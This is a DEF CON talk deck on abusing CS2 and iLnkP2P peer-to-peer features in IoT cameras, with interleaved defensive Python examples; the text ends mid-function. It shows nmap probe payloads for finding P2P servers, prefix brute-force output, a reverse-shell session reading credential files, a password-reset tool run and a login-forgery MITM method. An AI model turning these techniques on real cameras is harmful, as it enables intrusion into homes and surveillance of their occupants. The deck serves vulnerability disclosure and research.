Abusing P2P to Hack 
3 Million Cameras 


Paul Marrapese <paul@redprocyon.com> 
DEF CON 28 


What is this talk?

• Overview of a "convenience" feature found in millions of IoT devices
  • P2P is found in cameras, baby monitors, smart doorbells, DVRs, NASes, alarm systems...
  • Hundreds of different brands impacted (supply chain issue)
• How P2P exposes devices to the world
  • Devices are instantly accessible, even with NAT/firewalls
  • Obscure architecture and protocol (these devices aren't on Shodan!)
• How P2P can be abused to remotely attack devices
  • Stealing creds with over-the-Internet MITM attacks
  • Exploiting devices behind firewalls to get root shells


$ whoami

• Paul Marrapese (OSCP)
• San Jose, CA
• @PaulMarrapese / paul@redprocyon.com
• https://hacked.camera
• Red team at a large enterprise cloud company (opinions expressed are solely my own)
• Reverse engineering, music production, photography


All good things start with cats. 
[Slide: Amazon search results for cheap Wi-Fi cameras (Wansview, VStarcam, SV3C, Jennov), priced from about $35 to $70, each with hundreds to thousands of ratings]

Cheap cams galore

[Slide: Amazon listing for an SV3C 720P outdoor Wi-Fi camera, $29.99 to $55.99 depending on resolution, 1,663 ratings]

[Slide: IP lookup of 47.93.34.139]


Shady cams galore!

[Slide: Google results for Amazon reviews and questions that mention UDP port 32100]

Shady Camera - Amazon.com (customer review)
"54.179.151.251 port 32100 UDP Reolink client sends broadcasts to 255.255.255.255 on port 2000 which are also unnecessary. Don't recommend using this ..."

Why does this camera keep wanting to reach out to 123.57 ... (customer question)
"Why does this camera keep wanting to reach out to 123.57.136.155 on port 32100? how do i stop that from occurring? asked on May 29, 2017. Answer this ..."

Use at your own risk - Amazon.com (customer review)
"This device tries to connect to a Chinese IP every few seconds (in my case Hangzhou, Zhejiang) over port 32100 which is a commonly used malicious backdoor."

the documentation is not the best and it brings hidden ... (customer review)
"What is not documented is the constant communication with the following Chinese IP addresses using udp and port 32100: 47.88.16.73 120.78.75.50 59.110. ..."

(Upgraded Series A) SV3C POE Camera ... - Amazon.com
"Its also recommended to block outgoing UDP port 32100 to try to prevent the risk on your router/firewall. You can also disable the UID use for the P2P in the ..."

Shady Camera
Reviewed in the United States on November 23, 2016

Works ok. I've set this up with Milestone XProtect software and it works well for the most part. The night vision works really well and is crystal clear.

Now for the very bad:

- seems to be connecting to multiple cloud servers for no apparent reason (nothing is configured to do so and I'm not sure of the data it's transmitting yet)
- IPs:
  --> 52.5.24.217 port 9603 UDP
  --> 54.72.248.104 port 32100 UDP
  --> 54.86.23.37 port 32100 UDP
  --> 54.179.151.251 port 32100 UDP

the documentation is not the best and it brings hidden "features" that I don't really ...
Reviewed in the United States on May 14, 2018
Size: 720P

I would not purchase this camera again. While this camera does work as advertised, the documentation is not the best and it brings hidden "features" that I don't really think anyone wants.

P2P:

The camera has a protocol it labels as P2P. This is used between the iOS / Android app, called CamHi, and the camera to find and possibly configure the camera on the local LAN after the camera is plugged into an Ethernet port. What is not documented is the constant communication with the following Chinese IP addresses using udp and port 32100:

47.88.16.73
120.78.75.50
59.110.217.33
47.52.252.63

What is peer-to-peer (P2P)?

• In the context of IoT, a convenience feature for connectivity
• Plug and play: users can instantly connect to devices from anywhere
• Eliminates technical barriers for non-technical users
  • No port forwarding required
  • No dynamic DNS or remembering IP addresses required
  • No UPnP required (P2P is not UPnP)
• Automatically accepts connections, even with NAT/firewall restrictions

Your cheap camera's gaping security holes are now open to the world. Good luck.


Who provides P2P?

• Several different providers of P2P solutions in the industry
• Largest is probably ThroughTek (TUTK)'s Kalay platform (> 66m devices!) [1]
• This talk will focus on 2 in particular:
  • CS2 Network P2P (> 50m devices?) [2]
    • Libs: PPPP API, PPCS API, libPPPP API, libPPCS API
  • Shenzhen Yunni iLnkP2P (> 3.6m devices)
    • Functionally-identical clone of CS2 P2P (even has compatible API)
    • Libs: libxqun, libXQP2P API, libobject, PPPP API

1: https://www.throughtek.com/kalay_structure.html
2: http://cs2-network.cn/iot/about/slide/slide.php?slide=1


What are the risks of P2P?

• P2P, by design, is meant to expose devices
• In many cases, no way to turn it off
• You can obtain direct access to any device if you have its UID (unique identifier)
• Devices are usually ARM-based, running BusyBox with everything as root
• What could *possibly* go wrong?
  • Tired: Eavesdropping, data theft, disabling security systems
  • Wired: Pre-auth RCE on millions of devices


Anatomy of a P2P Network

P2P Servers

• Our gateway to millions of devices
• Manage all devices in the network
• Orchestrate connections between clients and devices
• Essentially C&C servers
• Owned and operated by device manufacturers
• Often hosted using Alibaba Cloud or AWS (usually in sets of 3 for redundancy)
• Listen on UDP port 32100
• Hundreds of these on the Internet

Devices

• All have their own unique identifier (UID)
  • Key concept: used for connecting to the device
  • i.e., users don't directly use IP addresses
• Should be considered "sensitive"
  • Anyone who knows the UID can connect
• Generated by P2P provider and provided to device manufacturer
• Written to device NVRAM during manufacturing, sometimes printed on label

[Slide image: device label printed with a UID of the form PPP-450140-FFBEC and the default password, PWD:admin]

Device UID
DEFC-000123-HAXME
Prefix - Serial Number - Check Code

• Prefix: Used for vendor/product grouping (up to 8 letters)
  • Vendor may have several (e.g. DEFA, DEFB, DEFC)
  • Vendor's P2P server will only support their specific prefixes
• Serial Number: Device identifier (typically 6-7 digits)
  • Sequentially generated
• Check Code: Used to protect UIDs and prevent spoofing (5-8 letters)
  • Security feature
  • Generated using secret algorithm by the P2P provider


Client

• Desktop/mobile app for connecting to device
• User enters UID in client, client sends connection request to the P2P servers

[Slide image: mobile app "Add Camera" screen with a camera name field (Camera), a username field (admin), and the options "Scan QR code, add UID", "Search Camera from LAN" and "Wireless Installation"]


Protocol

• Entirely UDP
  • Control messages to establish connections
  • "DRW" (device read/write) messages wrap application data (e.g. video, audio)
  • Guarantees both order and delivery despite being UDP
• Most messages are just packed C structs with a 4-byte header
  • Magic number (always 0xF1), message type (uint8), payload length (uint16)
• Developed Wireshark dissector to aid with reversing and traffic analysis


[Slide: Wireshark capture of a PPPP session between UDP ports 50596 and 46747 (with the server on 32100), shown beside the dissector's message definitions]

Message definitions as shown on the slide (field names restored; all integers big endian):

struct T_message_header
    uint8          magic_number;      (always 0xF1)
    T_message_type message_type;
    uint16         message_size;

struct T_network_address
    call parse_sockaddr_in_le();

struct T_empty_message
    T_message_header message_header;

struct T_MSG_HELLO_ACK
    T_message_header  message_header;
    T_network_address wan_address;

struct T_MSG_HELLO_TO
    T_message_header  message_header;
    T_network_address target_address_1;
    T_network_address target_address_2;

struct T_MSG_QUERY_DID
    T_message_header message_header;
    string           device_name;

struct T_MSG_QUERY_DID_ACK
    T_message_header message_header;
    string           device_uid;

struct T_MSG_DEV_LGN
    T_message_header  message_header;
    var_string        device_uid = parse_uid();
    uint8             nat_type;
    uint24            api_version;
    T_network_address local_address;

Message types visible in the capture: MSG_HELLO_ACK (1), MSG_P2P_REQ_ACK (33), MSG_PUNCH_TO (64), MSG_PUNCH_PKT (65)

Decoded packet (User Datagram Protocol, Src Port: 32100, Dst Port: 50596):
    pppp, message type: MSG_PUNCH_TO (64)
        message header
            magic number: 0xf1 (241)
            message type: MSG_PUNCH_TO (64)
            message size: 16
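The 4-byte header described above, as an added Python example (it is not the talk's Wireshark dissector): it parses the header, names the message types that appear in the captures, decodes the signed result byte of MSG_P2P_REQ_ACK (the reason the later "Finding Prefixes" slides talk about 0xFD and 0xFF responses: those are -3 and -1 as bytes), and labels constructed sample datagrams the way a network monitor watching for traffic to UDP/32100 would. The name MSG_HELLO for type 0 and the REQ_ACK payload layout (result byte first) are assumptions.

```python
"""Parse the PPPP/CS2 4-byte message header and classify UDP datagrams.

Added example, not the talk's dissector. Header layout is the slide's:
magic 0xF1, uint8 message type, uint16 big-endian payload length. Type
numbers come from the talk's captures; the name MSG_HELLO for type 0 and
the assumption that MSG_P2P_REQ_ACK starts with a signed result byte are
mine.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

PPPP_MAGIC = 0xF1
PPPP_SERVER_PORT = 32100  # UDP port the P2P servers listen on (from the talk)

# Message types named on the slides (decimal number on the slide in comments).
MSG_TYPES = {
    0x00: "MSG_HELLO",        # f1 00 00 00 probe (name assumed)
    0x01: "MSG_HELLO_ACK",    # f1 01 00 00 reply (1)
    0x20: "MSG_P2P_REQ",      # (32)
    0x21: "MSG_P2P_REQ_ACK",  # (33)
    0x40: "MSG_PUNCH_TO",     # (64)
    0x41: "MSG_PUNCH_PKT",    # (65)
}


@dataclass
class PPPPHeader:
    msg_type: int
    size: int

    @property
    def name(self) -> str:
        return MSG_TYPES.get(self.msg_type, f"UNKNOWN_{self.msg_type:#04x}")


def parse_header(datagram: bytes) -> Optional[PPPPHeader]:
    """Return the header, or None if this is not a well-formed PPPP datagram."""
    if len(datagram) < 4 or datagram[0] != PPPP_MAGIC:
        return None
    msg_type, size = struct.unpack(">BH", datagram[1:4])
    # The declared payload length must match what is actually on the wire;
    # a mismatch is either not PPPP or a truncated/forged packet.
    if size != len(datagram) - 4:
        return None
    return PPPPHeader(msg_type, size)


def req_ack_result(datagram: bytes) -> Optional[Tuple[int, int]]:
    """Decode MSG_P2P_REQ_ACK as (signed result, same byte unsigned).

    Assumes the result is the first payload byte. Result -3 is 0xFD
    (invalid prefix) and -1 is 0xFF (valid prefix, bad serial/check code).
    """
    hdr = parse_header(datagram)
    if hdr is None or hdr.msg_type != 0x21 or hdr.size < 1:
        return None
    signed = struct.unpack(">b", datagram[4:5])[0]
    return signed, signed & 0xFF


def classify_flow(dst_port: int, datagram: bytes) -> str:
    """Label one captured UDP datagram for a network monitor.

    Anything that parses as PPPP and is addressed to UDP/32100 is a device
    (or client) talking to a P2P server: the traffic the Amazon reviewers
    noticed, and what an egress policy for a camera VLAN would block.
    """
    hdr = parse_header(datagram)
    if hdr is None:
        return "not-pppp"
    if dst_port == PPPP_SERVER_PORT:
        return f"p2p-server-bound:{hdr.name}"
    return f"p2p-peer:{hdr.name}"


# Constructed sample datagrams (not captured traffic).
SAMPLES = [
    (32100, bytes.fromhex("f1000000")),          # hello probe to a server
    (50596, bytes.fromhex("f1010000")),          # hello ack back to the sender
    (50596, bytes.fromhex("f1210004fd000000")),  # req ack, result -3 (0xFD)
    (50596, bytes.fromhex("f1210004ff000000")),  # req ack, result -1 (0xFF)
    (53, b"\x12\x34\x01\x00"),                   # ordinary DNS, not PPPP
    (32100, bytes.fromhex("f10000ff")),          # magic ok, length field lies
]


def classify_samples() -> List[str]:
    return [classify_flow(port, data) for port, data in SAMPLES]


if __name__ == "__main__":
    for (port, data), label in zip(SAMPLES, classify_samples()):
        print(f"udp/{port:<5} {data.hex():<16} -> {label}")
```

The length consistency check matters for a monitor: the magic byte alone is a weak signal, but magic plus a length that matches the datagram is enough to separate PPPP from other UDP traffic on the same port.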
Connecting to Devices
(or, how to punch through firewalls)

UDP hole punching

• A technique to establish direct connections even with NAT/firewalls
• Takes advantage of how NAT creates inbound rules based on outbound packets
  • For example: if we make a DNS request, the router needs to create a rule so the response gets back to us
• If we have a target IP and port, we can create a rule by sending a packet there
  • But how do we know the peer's IP and port if we can't talk to them?
• We can use the P2P server to exchange address information!
  • Both sides can then send packets to each other, which creates rules in their respective NATs to let packets from the other side through
• Why yes, this *is* very similar to STUN!

[Diagram, four steps; client at 1.2.3.4:10000 and device at 9.8.7.6:20000, both registered with the P2P servers]
1. P2P servers tell the device "Punch to 1.2.3.4:10000" and the client "Punch to 9.8.7.6:20000"
2. Device sends a packet toward the client: device NAT opens port for client
3. Client sends a packet toward the device: client NAT opens port for device
4. Direct connection established

Relayed connections

• UDP hole punching doesn't always work
• As a fallback, peers can talk through a "relay server":
  • If both sides can connect to the same relay, it can proxy traffic between them

[Diagram: client (1.2.3.4:10000) and device (9.8.7.6:20000) both connected to a relay at 2.4.6.8:30000]


Superdevices

• Devices that act as relays to support the network
• Users have no way to opt out of this (hope you don't have bandwidth quotas!)
• Sketchy, but not actually uncommon in P2P architectures (supernodes)
• Spoiler alert: we're going to have fun with these.

[Diagram: client (1.2.3.4:10000) and device (9.8.7.6:20000) relayed through a superdevice at 6.6.6.6:30000]


Hunting for Devices

Finding P2P Servers

• Desktop and phone apps are one way to find P2P server addresses
• More efficient: nmap UDP probes on cloud provider IP ranges!
  • Send hello message (0xf1000000) to UDP port 32100
  • Valid P2P servers will respond with ACK message (0xf1010000)
  • Add udp 32100 "\xf1\x00\x00\x00" to /usr/share/nmap/payloads
  • nmap -n -sn -PU32100 --open -iL ranges.txt
• 618 confirmed P2P servers discovered as of July 2020
  • Discrepancies in responses allowed a fingerprinting technique to be developed
  • 86% are CS2, 14% are iLnkP2P


Finding Prefixes

• To use P2P servers, we need to find out which prefixes they support
• Again, desktop and phone apps are one way to find prefixes
• Also, Amazon reviews...

[Slide: photos attached to customer reviews, showing the camera app's device list (Back door, Driveway, Front door, Dogs, Parking, Front yard, Xtra, Xtra2; BACKYARD, FRONTYARD, BARNVIEW) with each camera's online status and UID visible]

Great low budget surveillance system.
By Scott on Oct 11, 2019
Great low budget surveillance system. I have 8 Cameras covering our home drive way and dog kennel. The entire family can access the cameras remotely through the app.

EASY INTERFACE GREAT QUALITY
By KR on Apr
Very easy to set up, install, and the app interface is extremely simple. Great quality video/pictures. Can download to phone or screen shot. All settings adjustable via phone app. App claims to support up to 64 cams. I currently have 3. Switching between different cams or different cam's recorded video is quick. Motion detection is very sensitive and sends alert in real time. I have my record set to 5 min intervals like my dash cam however that is also adjustable. Some security cams have choppy playback THIS CAM IS SMOOTH AND CLEAR. Night vision is impeccable. There is nothing I do not like about these cameras. I would like to have smart recognition for motion sensing BUT THAT WOULD BE A

Request / Response

Invalid prefix (0xFD)

Request:
    pppp, message type: MSG_P2P_REQ (32)
        message header
            magic number: 0xf1 (241)
            message type: MSG_P2P_REQ (32)
        device uid: FAK...

Response:
    pppp, message type: MSG_P2P_REQ_ACK (33)
        message header
            magic number: 0xf1 (241)
            message type: MSG_P2P_REQ_ACK (33)
        result: -3
        api version: ...

    Raw bytes: f1 21 00 04 ...

Invalid UID, valid prefix (0xFF)

Request:
    pppp, message type: MSG_P2P_REQ (32)
        message header
            magic number: 0xf1 (241)
            message type: MSG_P2P_REQ (32)
            message size: 36
        device uid: IIII-000123-ABCDE
        local address
            family: 2

Response:
    pppp, message type: MSG_P2P_REQ_ACK (33)
        message header
            magic number: 0xf1 (241)
            message type: MSG_P2P_REQ_ACK (33)
            message size: 4
        result: -1
        api version: 0.0.0


Finding Prefixes

[paul@tempest:src]$ node . enum/prefix.js
info: Brute-forcing 17576 prefixes (ETA: 1hrs)
info: 5%... (BHV)
info: 10%... (CPQ)
info: 15%... (DXL)
info: Found servers for EYE: 54.214.22.83
info: 20%... (FFG)
info: 25%... (GNA)
info: 30%... (HUV)
info: 35%... (JCQ)
info: 40%... (KKL)
info: 45%... (LSG)

Finding Prefixes

• Can infer validity of prefix from server response code
  • 0xFD: Invalid prefix
  • 0xFF: Valid prefix but invalid serial / check code
• Can brute force all 3-letter combinations in ~1hr, 4-letter in ~36hrs
  • No rate limiting!
• Discovered 488 distinct prefixes on 487 P2P servers as of July 2020
  • Average is 4 per server, but some servers support >130 prefixes

Finding UIDs

• We have prefixes, we can easily infer serial numbers (sequential numbers)
• The problem is now the check code:
  • Exists to stop precisely this sort of attack
  • If the UID is DEFC-000123-HAXME, DEFC-000123-HAXMF will not work
  • Keyspace makes brute forcing impractical
• How can we get around this?


Predictable iLnkP2P UIDs (CVE-2019-11219)

• Some iLnkP2P libraries shipped with their secret check code algorithm
  • Uses modified MD5; the check code is the letters from the resulting hash (i.e. A-F)
  • Apparently included to validate UIDs, even though the server already does that
• We can now connect to any device that uses iLnkP2P
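What the check code would have to look like to survive the library leak, as an added Python example (this is not the provider's algorithm, which the talk describes only as a modified MD5 whose hex letters become the code): the check code is an HMAC over prefix and serial under a key that never leaves the P2P provider, so shipping the algorithm in a client library reveals nothing. The key, the HMAC choice and the letter mapping are assumptions; the UID format is the slide's DEFC-000123-HAXME.

```python
"""Keyed UID check codes: the property the leaked iLnkP2P algorithm lacked.

Added example, not the provider's scheme. A check code that is a
deterministic function of public inputs (prefix, serial) is only secret
while the function is; a keyed MAC moves the secret into a key the client
never holds, so the algorithm can be public. UID format PREFIX-SERIAL-CHECK
as on the slide (DEFC-000123-HAXME).
"""
import hashlib
import hmac
import string

ALPHABET = string.ascii_uppercase   # 26 letters, as on the slide
CHECK_LEN = 5                       # slide: check codes are 5-8 letters


def keyed_check_code(prefix: str, serial: int, key: bytes) -> str:
    """Check code = letters chosen by HMAC-SHA256(key, "PREFIX-SERIAL").

    26 letters in each of 5 positions is the 26**5 keyspace the talk calls
    impractical to brute force; without `key` the code cannot be computed.
    (b % 26 has a slight modulo bias; a production design would use
    rejection sampling, which does not change the point here.)
    """
    msg = f"{prefix}-{serial:06d}".encode()
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return "".join(ALPHABET[b % 26] for b in digest[:CHECK_LEN])


def make_uid(prefix: str, serial: int, key: bytes) -> str:
    """Issued by the provider at manufacturing time, key in hand."""
    return f"{prefix}-{serial:06d}-{keyed_check_code(prefix, serial, key)}"


def verify_uid(uid: str, key: bytes) -> bool:
    """Server-side check: recompute the code and compare in constant time."""
    try:
        prefix, serial_s, check = uid.split("-")
        serial = int(serial_s)
    except ValueError:
        return False
    if not (prefix.isalpha() and prefix.isupper() and 1 <= len(prefix) <= 8):
        return False
    expected = keyed_check_code(prefix, serial, key)
    return hmac.compare_digest(expected, check)


def demo() -> dict:
    # Constructed key for the demo; a real provider keeps it in an HSM/KMS.
    server_key = b"provider-secret-key-constructed-for-demo"
    uid = make_uid("DEFC", 123, server_key)
    # The next serial with the same check code is rejected, as the slide
    # says of DEFC-000123-HAXMF versus DEFC-000123-HAXME.
    neighbour = f"DEFC-000124-{uid.split('-')[2]}"
    # Someone holding this file (the algorithm) but not the key can only guess.
    forged = make_uid("DEFC", 123, b"guessed-key")
    return {
        "uid": uid,
        "genuine_ok": verify_uid(uid, server_key),
        "neighbour_ok": verify_uid(neighbour, server_key),
        "forged_ok": verify_uid(forged, server_key),
        "malformed_ok": verify_uid("DEFC-000123", server_key),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:<14} {v}")
```

The contrast with the finding above is the location of the secret: here it is a key held only by the verifier, so distributing `keyed_check_code` with every camera app costs nothing, whereas a scheme whose only secret is the algorithm is broken the first time the library ships.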


[Slide: scan output for predicted UIDs FFFF-019748 through FFFF-020060 (check codes masked); every one is ONLINE, with source addresses (last two octets masked) geolocated mostly to Italy, Spain and France, plus Brazil, Guadeloupe and Greece]

[Slide: the same for predicted UIDs ZZZZ-017501 through ZZZZ-017639; all ONLINE]

Predictable iLnkP2P UIDs (CVE-2019-11219)

[Slide: further results geolocated to Thailand, China, Germany, Austria and the United Kingdom]

Predictable iLnkP2P UIDs (CVE-2019-11219)

• Over 3.6 million devices as of July 2020, many of which use default passwords
• Disclosed to Shenzhen Yunni Technology in February 2019
  • No response despite several attempts
  • New iLnkP2P UIDs are still being issued today
• Does not affect CS2... but more on that later.


Exploiting Devices
(or, how to shoot fish in a barrel)

Let's find some camera vulns!

• Shenzhen Hichip Vision Technology, Co.
  • Major manufacturer, worldwide market (ODM)
  • Used by a huge number of OEMs
    • OEMs buy from Hichip and add their own branding
    • Can easily identify OEMs by their use of the "CamHi" app
  • At least 50 P2P servers and 29 prefixes
  • 2.95 million (81%) of the iLnkP2P devices I've found have been Hichip

OEMs using Hichip

Accfly, Alptop, Anlink, Avidsen, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GatoCam, GENBOLT, Hongjingtian (HJT), ICAMI, ieGeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, MEOBHI, Nesuniq, Nettoly, OWSOO, PNI, ProElite, QZT, NOEN, SDETER, SV3C, SY2L, Tenvis, ThinkValue, THOMSON, TOMLOV, TonTon Security, TPTEK, Wanscam, WGCC, WYJW, ZILINK, Zysecurity


Hunting for vulnerabilities

• Obtained firmware samples from reseller sites (often just a ZIP file, easy to analyze)
• HI_P2P_Cmd_ReadRequest handles commands received over P2P
  • Used for everything including login; you don't need auth to hit this function

    while ( 1 )
    {
      memset(&buff, val, 1024u);
      res = HI_P2P_Cmd_ReadRequest(handle, val, (int)&buff);
      ...


Hunting for vulnerabilities

    else if ( *buff == 0x99999999 )
    {
      length = *(buff + 4);
      if ( length > 10240 )
      {
        printf("HI ReadCmd: head param len=%d error \n", *(buff + 4));
        result = -1010;
      }
      else
      {
        if ( !length )
          return 0;
        res2 = PPCS_Read(handle);
        if ( res2 >= 0 )
          return 0;
        if ( res2 == -3 )
          return -1005;
        printf("HI ReadCmd:PPCS Read data error %d\n", res2);
        result = -1007;
      }
    }
    else
    {
      printf("HI ReadCmd: head param flag error 0X%x\n");
      result = -1001;
    }
    return result;


Hunting for vulnerabilities

    if ( length > 10240 )
    {
      printf("HI ReadCmd: head param len=%d error \n", *(buff + 4));
      result = -1010;
    }
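The two bounds side by side, as an added Python example rather than Hichip's code: the shipped check compares the header's length field against the constant 10240, while the caller cleared a buffer of only 1024 bytes (memset(&buff, val, 1024u) on the previous slide); a hardened check bounds the length by the destination buffer instead. The layout assumed here is a 4-byte flag 0x99999999 followed by a 4-byte little-endian length (an assumption about the decompiled *(buff + 4)); the error codes are the decompiled ones.

```python
"""Shipped vs. hardened length check on the Hichip P2P command header.

Added example, not Hichip's code. It reproduces only the decision shown
in the decompiled slides: a header whose first 4 bytes must equal the
flag 0x99999999 and whose next 4 bytes carry the body length, checked
against the constant 10240, while the receive buffer is 1024 bytes.
Little-endian field order is an assumption.
"""
import struct
from typing import List, Tuple

FLAG = 0x99999999
BUFF_SIZE = 1024          # what the caller allocates and memsets
ORIGINAL_LIMIT = 10240    # what the shipped check compares against

ERR_FLAG = -1001          # decompiled: "head param flag error"
ERR_LEN = -1010           # decompiled: "head param len=%d error"


def check_original(header: bytes) -> int:
    """The shipped logic: any declared body up to 10240 bytes is accepted."""
    flag, length = struct.unpack("<II", header[:8])
    if flag != FLAG:
        return ERR_FLAG
    if length > ORIGINAL_LIMIT:
        return ERR_LEN
    return 0


def check_hardened(header: bytes, buff_size: int = BUFF_SIZE) -> int:
    """Bound the declared length by the destination buffer, not a constant.

    The check is tied to the buffer the body is read into, so it cannot
    silently diverge from the allocation the way a hard-coded limit does.
    """
    flag, length = struct.unpack("<II", header[:8])
    if flag != FLAG:
        return ERR_FLAG
    if length > buff_size:
        return ERR_LEN
    return 0


def make_header(flag: int, length: int) -> bytes:
    return struct.pack("<II", flag, length)


def compare_policies() -> List[Tuple[int, int, int]]:
    """(declared length, original verdict, hardened verdict) for constructed headers."""
    cases = [
        make_header(FLAG, 512),       # fits the buffer
        make_header(FLAG, 1024),      # exactly fills it
        make_header(FLAG, 4096),      # passes the 10240 check; 4x the buffer
        make_header(FLAG, 10240),     # still passes; 10x the buffer
        make_header(FLAG, 10241),     # the first size the original rejects
        make_header(0x41414141, 64),  # wrong flag: both reject
    ]
    return [(struct.unpack("<I", h[4:8])[0], check_original(h), check_hardened(h))
            for h in cases]


if __name__ == "__main__":
    print(f"{'length':>7} {'original':>9} {'hardened':>9}")
    for length, orig, hard in compare_policies():
        print(f"{length:>7} {orig:>9} {hard:>9}")
```

Every declared length between 1025 and 10240 is the window the shipped check leaves open; the checksec output on the next slides (no PIE, no canary in the libraries) is what turns that window into reliable code execution, as the talk goes on to say.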


Pre-auth remote code execution (CVE-2020-9527)

[paul@aurora:checksec.sh]$ ./checksec --file=/home/paul/ipc_server
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols
[paul@aurora:checksec.sh]$ ./checksec --file=/home/paul/libAPILib.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols
No RELRO        No canary found   NX enabled    DSO             No RPATH   No RUNPATH   No Symbols
[paul@aurora:checksec.sh]$ ./checksec --file=/home/paul/libhichip.so
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols
No RELRO        No canary found   NX enabled    DSO             No RPATH   No RUNPATH   No Symbols


Pre-auth remote code execution (CVE-2020-9527)

[paul@juno ~]$ sudo ncat -lvk 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from [redacted]
Ncat: Connection from [redacted]
pwd
/tmp
ls -al
drwxr-xr-x    root  root      80 Jun  7 09:18 .
drwxrwxrwt    root  root     380 Jun  7 09:18 ..
-rwxr-xr-x    root  root  411085 Jun  7 09:18 nc
prw-r--r--    root  root       0 Jun  7 09:19 x


Pre-auth remote code execution (CVE-2020-9527)

[Slide: directory listing on the camera showing hostapd8192_5g.conf, imx307.bin, ipcam_upnp.xml, resolv.conf, run, sc2232.bin, udhcpc, udhcps, wifi.conf]

cat config_user.ini
[user]
username=[redacted]
password=[redacted]
authtype=[redacted]
authgroup=[redacted]

[user1]
username=[redacted]
password=[redacted]
authtype=[redacted]


Pre-auth remote code execution (CVE-2020-9527)

/ # wpa_cli
wpa_cli v2.6
Copyright (c) 2004-2016, Jouni Malinen <j@w1.fi> and contributors

This software may be distributed under the terms of the BSD license.
See README for more details.

Selected interface 'wlan0'
Interactive mode

> scan
OK
<3>CTRL-EVENT-SCAN-RESULTS
> scan_results
bssid / frequency / signal level / flags / ssid
[bssid and ssid columns redacted]
  2462  -47  [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]
  2462  -47  [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]
  2462  -49  [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]
  2412  -49  [WPA-EAP-CCMP][WPA2-EAP-CCMP][ESS]
  2437  -51  [WPA-EAP-CCMP+TKIP][WPA2-EAP-CCMP+TKIP][ESS]
  2437  -51  [WPA2-PSK-CCMP][ESS]
  2457  -61  [WPA2-PSK-CCMP][ESS]
  2437  -63  [WPA2-PSK-CCMP][ESS]
  2462  -65  [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]
  2452  -67  [WPA2-PSK-CCMP][ESS]
  2412  -67  [WPA2-PSK-CCMP][ESS]
  2412  -69  [WPA2-PSK-CCMP][ESS]
  2412  -69  [WPA2-PSK-CCMP][ESS]
  2432  -83  [WPA-PSK-CCMP+TKIP][WPA2-PSK-CCMP+TKIP][ESS]
  2462  -75  [WPA2-PSK-CCMP][ESS]


Pre-auth remote code execution (CVE-2020-9527)

[paul@tempest:~]$ curl -H 'Content-type: application/json' \
>   --data '{ "considerIp": false, "wifiAccessPoints": [ { "macAddress": "[redacted]" }, { "macAddress": "[redacted]" } ] }' \
>   'https://www.googleapis.com/geolocation/v1/geolocate?key=[redacted]'
{
  "location": {
    "lat": 37.***,
    "lng": -121.***
  },
  "accuracy": 189
}


Pre-auth remote code execution (CVE-2020-9527)

• Buffer overflow in login routine allows remote execution of arbitrary code
  • If you have a vulnerable device's UID, you can get a shell!
• Binaries compiled without ASLR/PIE/stack canaries
  • Offsets vary between versions, but very reliable code execution
• Affects firmware from August 2018 through June 2020


Password reset via LAN (CVE-2020-9529)

• Affects all firmware prior to June 2020

[paul@tempest:admin_reset]$ ./reset.sh
[*] Hichip IP Camera Admin Password Reset (CVE-2020-9529)
[*] Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>
Enter device IP (or press enter for autodiscovery):
[*] Searching for device...
[*] Resetting admin password of device at 192.168.1.8...
[*] Response received!

MCTP/1.0 200 OK
CSeq:1
Client-ID:bogus
Device-ID:48ff0e5ec780ce09d3ff923e3a7ce6a3
Content-Type: text/HDP
Content-Length: 74

Segment-Num: 1
Segment-Seq: 1
Data-Length: 26

[Success]usrpwd reset!


Abusing P2P to Conduct 
Man-in-the-Middle Attacks 


Over-the-Internet MITM 


• P2P servers coordinate all connections
  • If we can influence that, man-in-the-middle may be possible
  • Can be done over the Internet, not restricted to the local network
• The P2P layer offers no effective protection of session data
  • Application is entirely responsible for security
  • Most do not employ encryption at all, or do so in an insecure fashion


Over-the-Internet MITM 


Building an encrypted channel... 


Over-the-Internet MITM 


• Devices regularly log in to P2P servers
  • Server takes note of message origin (IP and UDP port)
  • When a client requests a connection, servers tell the client to punch to that address
• This login message contains just the UID -- no device-specific secret
• If we possess a UID, we can forge this message to confuse the server
  • The user will connect to us and authenticate without hesitation...
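To make the flaw concrete, here is an added example (a toy in-memory rendezvous server written for this page, not CS2's or iLnkP2P's code) that models the login flow just described next to a hardened variant. WeakRendezvous does exactly what the bullets say: the login carries only the UID and the server records the origin of the latest login. HardenedRendezvous adds a per-device secret and a single-use server challenge, so a login cannot be forged from the UID alone and a captured login cannot be replayed. The UID, addresses, secrets and message framing are all constructed, and the fix shown is the standard design, not a description of CS2's announced v4.0 changes.

```python
"""Model of the device-login flaw behind the MITM, next to a hardened variant.

Added example: a toy in-memory rendezvous server, not CS2's or iLnkP2P's code.
The UID, addresses and secrets are constructed.
"""
import hashlib
import hmac
import os

UID = "ABCD-123456-EFGHI"              # constructed UID, shape assumed
DEVICE_ADDR = ("203.0.113.10", 32100)  # where the real camera logs in from
ATTACKER_ADDR = ("198.51.100.7", 40000)


class WeakRendezvous:
    """As on the page: the login carries only the UID, and the server records
    the origin of the most recent login for that UID. Last writer wins."""

    def __init__(self):
        self.endpoints = {}

    def dev_login(self, uid, src_addr):
        self.endpoints[uid] = src_addr      # no proof that the sender owns the UID
        return True

    def client_connect(self, uid):
        """The address the server tells a client to hole-punch to."""
        return self.endpoints.get(uid)


def login_tag(secret, uid, nonce):
    """HMAC over the login fields; only the holder of the device secret can produce it."""
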